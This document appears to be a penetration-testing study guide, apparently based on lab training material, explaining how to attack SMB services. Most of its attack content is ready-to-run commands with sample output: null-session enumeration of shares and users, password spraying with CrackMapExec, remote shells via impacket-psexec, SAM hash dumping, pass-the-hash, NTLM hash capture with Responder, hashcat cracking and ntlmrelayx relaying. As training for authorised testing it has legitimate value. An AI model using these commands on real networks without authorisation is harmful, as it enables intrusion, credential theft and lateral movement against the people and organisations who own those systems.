Attacking SMB

Here’s the English explanation of the provided text about attacking the Server Message Block (SMB) protocol, broken down step-by-step in a detailed yet simple way:

---

What is SMB?

• SMB (Server Message Block) is a protocol that lets devices on a network share files and printers.

• Originally, it worked over NetBIOS using TCP port 139 and UDP ports 137/138. Now, modern Windows systems run it directly over TCP on port 445 without NetBIOS.

• If NetBIOS is enabled or you’re targeting a non-Windows system, you’ll see SMB on port 139.

• Samba is an open-source version of SMB for Linux/Unix, letting them work with Windows systems.

In short, SMB is like a bridge for sharing stuff between devices, running on port 445 or 139 depending on the setup.

---

How to Attack SMB?

To attack an SMB server, you need to know how it’s set up, what operating system it’s on (Windows or Linux), and which tools to use. Like other services, you can exploit:

1. Misconfigurations: Like if it’s open without a password.

2. Known Vulnerabilities: If there’s a flaw in its version.

3. New Vulnerabilities: If you discover something new.

Once you get in, check the shared folders (shares) for useful files. If targeting NetBIOS or RPC (Remote Procedure Call), figure out what info you can grab or what actions you can take.

---

Step 1: Enumeration (Gathering Info)

We use a tool like Nmap to see what’s running on the server. SMB uses ports 139 and 445, so we scan those:

sudo nmap 10.129.14.128 -sV -sC -p139,445

Example Output:

• Ports 139 and 445 are open.

• Version: Samba 4.6.2 (means it’s Linux, not Windows).

• Hostname: HTB.

• OS: Linux (since it’s using Samba).

Now we know the server runs Samba (Linux SMB), and we can plan our attack.

---

Exploiting Misconfigurations

Sometimes SMB is set up to allow access without a username or password, called a Null Session.

1. Anonymous Authentication (Login Without Credentials)

If the server allows this, you can grab info like:

• List of shared folders (shares).

• Usernames.

• Permissions.

Tools to Use:

• smbclient: Lists shared folders There’s a "notes" folder we can explore.

  smbclient -N -L //10.129.14.128

  • N: No password (Null Session).

  • L: List shares. Example Output:

    Sharename    Type    Comment
    ADMIN$       Disk    Remote Admin
    C$           Disk    Default share
    notes        Disk    CheckIT
    IPC$         IPC     IPC Service

• smbmap: Shows permissions for each share: Example Output: "notes" has read/write access, so we can download or upload files.

  smbmap -H 10.129.14.128

  Disk         Permissions    Comment
  ADMIN$       NO ACCESS      Remote Admin
  C$           NO ACCESS      Default share
  IPC$         READ ONLY      IPC Service
  notes        READ, WRITE    CheckIT

Downloading and Uploading Files:

• Download a file:

  smbmap -H 10.129.14.128 --download "notes\\note.txt"

  • Downloads note.txt from the "notes" folder.

• Upload a file:

  smbmap -H 10.129.14.128 --upload test.txt "notes\\test.txt"

  • Uploads test.txt to the "notes" folder.

2. Remote Procedure Call (RPC)

To get more info like usernames, use rpcclient:

rpcclient -U'%' 10.10.110.17

• U'%': Null Session (no credentials). Inside the Tool:

  rpcclient $> enumdomusers
  user:[mhope] rid:[0x641]
  user:[svc-ata] rid:[0xa2b]

This lists users on the server.

• enum4linux: Automates gathering all this info: It pulls users, shares, OS details, etc.

  ./enum4linux-ng.py 10.10.11.45 -A -C

---

Protocol-Specific Attacks

If Null Session isn’t available, you’ll need credentials. Two common methods:

1. Brute Force: Try tons of passwords on one user, but it might lock the account.

2. Password Spraying: Try one password on many users to avoid lockouts.

Using CrackMapExec (CME):

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

• u: File with users (e.g., Administrator, admin, jrodriguez).

• p: One password (e.g., Company01!). Example Output:

  SMB  10.10.110.17 445  WIN7BOX  [-] WIN7BOX\\Administrator:Company01! STATUS_LOGON_FAILURE 
  SMB  10.10.110.17 445  WIN7BOX  [+] WIN7BOX\\jurena:Company01! (Pwn3d!)

Found that jurena uses Company01!.

---

Attacks on Windows

If it’s a Windows server and you have admin rights, you can do more:

1. Remote Code Execution (RCE)

• With impacket-psexec: Gives you a command shell:

  impacket-psexec administrator:'Password123!'@10.10.110.17

  C:\\Windows\\system32> whoami
  nt authority\\system

• With CrackMapExec: Runs the command and returns nt authority\system.

  crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami'

2. List Logged-On Users

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Shows who’s logged in across the network.

3. Extract Hashes from SAM

• The SAM (Security Account Manager) is a database with user password hashes. Output:

  crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
  jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::

4. Pass-the-Hash (PtH)

If you have a hash (e.g., 2b576acbe6bcfda7294d6bd18041b8fe), use it without cracking:

crackmapexec smb 10.10.110.17 -u Administrator -H 2b576acbe6bcfda7294d6bd18041b8fe

Logs you in as admin using the hash.

---

Forced Authentication Attacks (Stealing Hashes)

You can set up a fake SMB server with Responder to steal user hashes:

sudo responder -I ens33

• If someone mistypes a share (e.g., \\mysharefoder instead of \\mysharedfolder), Responder tricks them and grabs their hash:

  [SMB] NTLMv2-SSP Username : WIN7BOX\\demouser
  [SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:..

Cracking the Hash:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

If successful, it might reveal a password like P@ssword.

Relaying the Hash:

If you can’t crack it, relay it to another machine with impacket-ntlmrelayx:

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

This can dump the SAM or run commands if you add -c.

---

Summary

You can attack SMB in several ways:

• If it’s open without a password, check shares and grab/upload files.

• If locked, use Password Spraying or hashes.

• On Windows, run commands or extract hashes.

• To steal hashes, use Responder.